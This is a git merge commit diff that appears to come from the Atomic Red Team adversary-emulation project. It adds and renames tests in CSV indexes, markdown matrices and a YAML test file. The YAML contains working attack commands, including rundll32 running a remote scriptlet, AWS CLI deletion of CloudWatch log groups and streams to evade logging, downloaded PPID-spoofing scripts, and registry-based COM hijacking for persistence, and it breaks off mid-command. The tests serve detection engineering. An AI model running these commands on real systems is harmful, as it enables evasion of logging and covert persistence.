Merge branch 'master' into staratus_defense_evasion

2022-08-01 14:50:20 -07:00
parent 6a1b554579 75d1f18790
commit 9c43327f23
26 changed files with 746 additions and 44 deletions
@@ -1,5 +1,5 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
-defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
+defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
 defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
 defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
 defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
@@ -359,6 +359,8 @@ defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-2
 defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
 defense-evasion,T1562.008,Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
 defense-evasion,T1562.008,Disable Cloud Logs,4,Disable CloudTrail Logging Through Event Selectors via Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh
+defense-evasion,T1562.008,Disable Cloud Logs,5,AWS CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
+defense-evasion,T1562.008,Disable Cloud Logs,6,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
 defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
 defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
@@ -530,6 +532,7 @@ privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,b
 privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
 privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
+privilege-escalation,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
 privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
 privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
 privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
@@ -755,6 +758,7 @@ persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4
 persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
 persistence,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
+persistence,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
 persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
 persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
 persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
@@ -842,7 +846,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell
 lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
 lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
 lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
-lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
+lateral-movement,T1021.006,Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
 lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
 lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
 lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
@@ -1251,6 +1255,7 @@ command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Lin
 command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -1288,6 +1293,7 @@ impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - Linux,918f70a
 impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
 impact,T1529,System Shutdown/Reboot,8,Shutdown System via `poweroff` - Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,bash
 impact,T1529,System Shutdown/Reboot,9,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
+impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
 initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1566.001,Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
 initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
@@ -77,6 +77,8 @@ defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-2
 defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
 defense-evasion,T1562.008,Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
 defense-evasion,T1562.008,Disable Cloud Logs,4,Disable CloudTrail Logging Through Event Selectors via Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh
+defense-evasion,T1562.008,Disable Cloud Logs,5,AWS CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
+defense-evasion,T1562.008,Disable Cloud Logs,6,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
 defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
 defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
 defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
@@ -1,5 +1,5 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
-defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
+defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
 defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
 defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
 defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
@@ -394,6 +394,7 @@ privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,b
 privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
 privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
+privilege-escalation,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
 privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
 privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
@@ -551,6 +552,7 @@ persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4
 persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
 persistence,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
+persistence,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
 persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
 persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
 persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
@@ -602,7 +604,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell
 lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
 lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
 lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
-lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
+lateral-movement,T1021.006,Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
 lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
 lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
 lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
@@ -907,6 +909,7 @@ command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Lin
 command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
 impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
@@ -929,6 +932,7 @@ impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1
 impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
 impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
 impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
+impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
 initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1566.001,Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
 initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
@@ -527,6 +527,8 @@
  - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
  - Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
  - Atomic Test #4: Disable CloudTrail Logging Through Event Selectors via Stratus [linux, macos]
+  - Atomic Test #5: AWS CloudWatch Log Group Deletes [iaas:aws]
+  - Atomic Test #6: AWS CloudWatch Log Stream Deletes [iaas:aws]
 - [T1564.003 Hidden Window](../../T1564.003/T1564.003.md)
  - Atomic Test #1: Hidden Window [windows]
 - T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -841,6 +843,7 @@
  - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
  - Atomic Test #2: Powershell Execute COM Object [windows]
  - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
+  - Atomic Test #4: COM hijacking via TreatAs [windows]
 - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
  - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
 - T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1281,6 +1284,7 @@
  - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
  - Atomic Test #2: Powershell Execute COM Object [windows]
  - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
+  - Atomic Test #4: COM hijacking via TreatAs [windows]
 - [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md)
  - Atomic Test #1: Install Outlook Home Page Persistence [windows]
 - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
@@ -1463,7 +1467,7 @@
 - T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1021.006 Windows Remote Management](../../T1021.006/T1021.006.md)
  - Atomic Test #1: Enable Windows Remote Management [windows]
-  - Atomic Test #2: Invoke-Command [windows]
+  - Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows]
  - Atomic Test #3: WinRM Access with Evil-WinRM [windows]
 - [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md)
  - Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
@@ -2093,6 +2097,7 @@
  - Atomic Test #23: Lolbas replace.exe use to copy file [windows]
  - Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
  - Atomic Test #25: certreq download [windows]
+  - Atomic Test #26: Download a file using wscript [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
@@ -2214,6 +2219,7 @@
  - Atomic Test #7: Reboot System via `halt` - Linux [linux]
  - Atomic Test #8: Shutdown System via `poweroff` - Linux [linux]
  - Atomic Test #9: Reboot System via `poweroff` - Linux [linux]
+  - Atomic Test #10: Logoff System - Windows [windows]

 # initial-access
 - [T1133 External Remote Services](../../T1133/T1133.md)
@@ -162,6 +162,8 @@
  - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
  - Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
  - Atomic Test #4: Disable CloudTrail Logging Through Event Selectors via Stratus [linux, macos]
+  - Atomic Test #5: AWS CloudWatch Log Group Deletes [iaas:aws]
+  - Atomic Test #6: AWS CloudWatch Log Stream Deletes [iaas:aws]
 - T1564.003 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -630,6 +630,7 @@
  - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
  - Atomic Test #2: Powershell Execute COM Object [windows]
  - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
+  - Atomic Test #4: COM hijacking via TreatAs [windows]
 - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
  - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
 - T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -935,6 +936,7 @@
  - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
  - Atomic Test #2: Powershell Execute COM Object [windows]
  - Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
+  - Atomic Test #4: COM hijacking via TreatAs [windows]
 - [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md)
  - Atomic Test #1: Install Outlook Home Page Persistence [windows]
 - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
@@ -1058,7 +1060,7 @@
 - T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1021.006 Windows Remote Management](../../T1021.006/T1021.006.md)
  - Atomic Test #1: Enable Windows Remote Management [windows]
-  - Atomic Test #2: Invoke-Command [windows]
+  - Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows]
  - Atomic Test #3: WinRM Access with Evil-WinRM [windows]
 - [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md)
  - Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
@@ -1519,6 +1521,7 @@
  - Atomic Test #23: Lolbas replace.exe use to copy file [windows]
  - Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
  - Atomic Test #25: certreq download [windows]
+  - Atomic Test #26: Download a file using wscript [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
@@ -1581,6 +1584,7 @@
 - [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
  - Atomic Test #1: Shutdown System - Windows [windows]
  - Atomic Test #2: Restart System - Windows [windows]
+  - Atomic Test #10: Logoff System - Windows [windows]

 # initial-access
 - [T1133 External Remote Services](../../T1133/T1133.md)
@@ -240,7 +240,7 @@ defense-evasion:
      identifier: T1218.011
    atomic_tests:
    - name: Rundll32 execute JavaScript Remote Payload With GetObject
-      auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
+      auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
      description: 'Test execution of a remote script using rundll32.exe. Upon execution
        notepad.exe will be opened.

@@ -253,7 +253,11 @@ defense-evasion:
          type: Url
          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct
      executor:
-        command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+        command: 'start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication
+          ";document.write();GetObject("script:#{file_url}").Exec();
+
+          '
+        cleanup_command: 'taskkill /IM notepad.exe /f

          '
        name: command_prompt
@@ -15727,6 +15731,16 @@ defense-evasion:
        get_prereq_command: |
          New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
+      - description: 'PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+
+          '
+        prereq_command: 'if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1)
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
      executor:
        command: |
          . $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
@@ -21512,6 +21526,88 @@ defense-evasion:
          ./stratus cleanup --all
        name: sh
        elevation_required: false
+    - name: AWS CloudWatch Log Group Deletes
+      auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121
+      description: "Creates a new cloudWatch log group in AWS, Upon successful creation
+        it will Delete the group. Attackers can use this technique to evade defenses
+        by \ndeleting the log stream. Once it is deleted, the logs created by the
+        attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion\n"
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        cloudwatch_log_group_name:
+          description: Name of the cloudWatch log group
+          type: String
+          default: log-test
+        region:
+          description: Name of the region
+          type: String
+          default: us-east-1
+      dependencies:
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+          defult profile using: aws configure
+
+          '
+      executor:
+        command: |
+          aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+          echo "*** Log Group Created ***"
+          aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+          echo "*** Log Group Deleted ***"
+        cleanup_command: 
+        name: sh
+        elevation_required: false
+    - name: AWS CloudWatch Log Stream Deletes
+      auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932
+      description: "Creates a new cloudWatch log stream in AWS, Upon successful creation
+        it will Delete the stream. Attackers can use this technique to evade defenses
+        by \ndeleting the log stream. Once it is deleted, the logs created by the
+        attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html\n"
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        cloudwatch_log_group_name:
+          description: Name of the cloudWatch log group
+          type: String
+          default: test-logs
+        cloudwatch_log_stream_name:
+          description: Name of the cloudWatch log stream
+          type: String
+          default: '20150601'
+        region:
+          description: Name of the region
+          type: String
+          default: us-west-2
+      dependencies:
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+          defult profile using: aws configure
+
+          '
+      executor:
+        command: |
+          aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+          echo "*** Log Group Created ***"
+          aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+          echo "*** Log Stream Created ***"
+          aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+          echo "*** Log Stream Deleted ***"
+          aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+          echo "*** Log Group Deleted ***"
+        cleanup_command: 
+        name: sh
+        elevation_required: false
  T1564.003:
    technique:
      x_mitre_platforms:
@@ -34335,6 +34431,16 @@ privilege-escalation:
        get_prereq_command: |
          New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
+      - description: 'PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+
+          '
+        prereq_command: 'if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1)
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
      executor:
        command: |
          . $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
@@ -36898,6 +37004,44 @@ privilege-escalation:
        cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}'
          -Recurse -ErrorAction Ignore
        name: powershell
+    - name: COM hijacking via TreatAs
+      auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9
+      description: |-
+        This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
+        Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
+        test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
+
+        References:
+
+        https://youtu.be/3gz1QmiMhss?t=1251
+
+        https://github.com/enigma0x3/windows-operating-system-archaeology
+      supported_platforms:
+      - windows
+      executor:
+        command: "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\" /ve
+          /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\"
+          /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\\CLSID\"
+          /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add
+          \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\\CLSID\" /ve /T
